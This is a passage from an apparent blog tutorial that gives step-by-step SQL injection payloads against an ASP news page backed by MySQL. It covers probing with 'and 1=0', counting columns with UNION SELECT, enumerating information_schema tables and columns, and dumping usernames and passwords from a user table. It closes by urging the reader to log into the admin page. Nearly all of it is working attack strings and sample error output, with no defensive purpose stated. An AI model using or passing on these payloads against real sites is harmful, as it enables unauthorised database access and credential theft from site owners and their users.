step 2: add after 2 with space; and 1=0 OR and 1=1
so: http://www.site.com/news.asp?id=2 and 1=0
By 1=0 you should get an error, or empty page like:
ADODB.Field error '80020009'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/default.asp, line 0
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/default.asp, line 0
and with 1=1 you need to get a normal page.
step 3: add after the 2 without space (yes remove step 2 text) ;
+union+select+0+from+cruz3n
then you should get an error like:
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24-community-nt]Table 'ssk2006.cruz3n' doesn't exist
/inc/extra.asp, line 110
[MySQL][ODBC 3.51 Driver][mysqld-5.0.24-community-nt]Table 'ssk2006.cruz3n' doesn't exist
/inc/extra.asp, line 110
step 4: Then the database is:: ssk2006
step 5: (yes, remove everything after 2)
+union+select+0+from+information_schema.tables
OR go ahead until you get an error like:
Type mismatch
So like this:
+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables
Until then you get this error:
The used SELECT statement......
step 6: Now we are almost done!!
step 7: Change from: http://Site.com/news.asp?id=2 to http://..../news.asp?id=-2
(i changed 2 to -2 .. saying this because some dont see it)
Then the name of the frame/title must change to a number. (7 here for example)
step 8: Then you make from that number what you see "table_name" (without quotes) instead of 7 and then you get the name: CHARACTERS_SETS.
step 9: then you put behind: (7 is changed by table_name because of that number)
:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+where+table_schema='ssk2006'
the frame name changes to a table name like tblUsers.
put +limit+1,1 after the 'databasename' to check inside the tblUsers:
step9:
+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+where+table_schema='ssk2006'+limit+1,1
(ssk2006 is the database again)
Go ahead with counting up:
+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+where+table_schema='ssk2006'+limit+2,1
(or 3,1 of 4,1 ect ect)
until you get something with tblUser or something else with User. (Its still Type mismatch !)
step 10: tblUser is the table of the users!! yeah found
step 11: change
+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+where+table_schema='ssk2006'+limit+1,1
to:
+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'
Then you get again a number (7 for example, with still Type mismatch!)
step 12: change the number to column_name ; so you get this:
+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'
Then you see something like iUserID (or ex. login)
step 13: change
+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'
to:
+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'+limit+1,1
Write everything down what you get; like;
iUserActive , sUserName,sPassword ect ect
with the method limit 1,1 keep making it higher : 2,1 - 3,1 - 4,1 etc
step 14: change
+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+where+table_name='tblUser'+limit+4,1
to
+union+select+0,1,2,3,4,5,6,sUserId,8,9,10,11,12+from+tblUser
step 15: Now you have finished SQL injection
sUserName (ex: Cruz3N)
sUserEmail (ex: cruzenaldo@gmail.com)
sUserLogin (ex: Cruz3N)
sUserPassword (ex: Ganteng)
sUserEmail (ex: cruzenaldo@gmail.com)
sUserLogin (ex: Cruz3N)
sUserPassword (ex: Ganteng)
Now go to the admin login page, and have fun
No comments:
Post a Comment